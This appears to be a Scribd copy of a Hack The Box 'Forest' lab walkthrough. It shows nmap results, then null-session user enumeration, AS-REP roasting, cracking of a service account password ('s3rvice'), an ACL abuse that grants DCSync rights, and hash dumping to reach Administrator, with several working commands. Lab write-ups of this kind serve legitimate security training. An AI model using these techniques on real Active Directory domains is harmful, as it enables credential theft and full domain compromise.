Scribd
Upload
35 views12 pages

Forest

The document describes an Nmap scan of a target system that reveals open ports and services running on them. Further enumeration using tools like rpcclient, GetNPUsers.py, John, crackmapexec, and Bloodhound is able to retrieve user credentials and identify a method for escalating privileges to the Administrator account to obtain the root flag.

Uploaded by

gophish22
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
35 views12 pages

Forest

The document describes an Nmap scan of a target system that reveals open ports and services running on them. Further enumeration using tools like rpcclient, GetNPUsers.py, John, crackmapexec, and Bloodhound is able to retrieve user credentials and identify a method for escalating privileges to the Administrator account to obtain the root flag.

Uploaded by

gophish22
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

Forest

Recon

nmap

Nmap scan report for 10.10.10.161


Host is up (0.096s latency).

PORT STATE SERVICE VERSION


53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-
08-02 00:18:04Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP
(Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
(workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP
(Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49955/tcp open msrpc Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard
6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2022-08-01T17:18:55-07:00
| smb2-time:
| date: 2022-08-02T00:18:54
|_ start_date: 2022-08-01T14:40:19
|_clock-skew: mean: 2h26m44s, deviation: 4h02m30s, median: 6m43s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at


https://nmap.org/submit/ .
# Nmap done at Mon Aug 1 18:12:22 2022 -- 1 IP address (1 host up) scanned
in 69.56 seconds

Port 135/TCP - Microsoft Windows RPC

Using rpcclient we see null session is allowed and we're able to enumerate the active
directory users and groups as well
AS-REP Roasting attack

first, let's use rpcclient to enumerate the users

rpcclient -U "" 10.10.10.161 -N -c "enumdomusers" | awk -F'[][]' '{print


$2}' > users

got users
GetNPUsers.py

for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161


htb/${user} | grep -v Impacket; done

found TGT for svc-alfresco


John

s3rvice

crackmapexec and we get a pwn3d!

Evil-Winrm

user.txt

ldapdomaindump
host your http server to preview the data

Bloodhound

Sharp-Hound.ps1
we see a potential way to escalate priviales to the administrator user

Account operators group

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-
security-groups

creating new user


writedacl

adding myself to the Exchange Windows Permissions group

powerview.ps1
Import it and run the following

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -


PrincipalIdentity b3t4m3 -Rights DCSync

Now we should be able to use secretsdump.py to dump the ntds.dit file

Priv esc

Pass the hash

root.txt

You might also like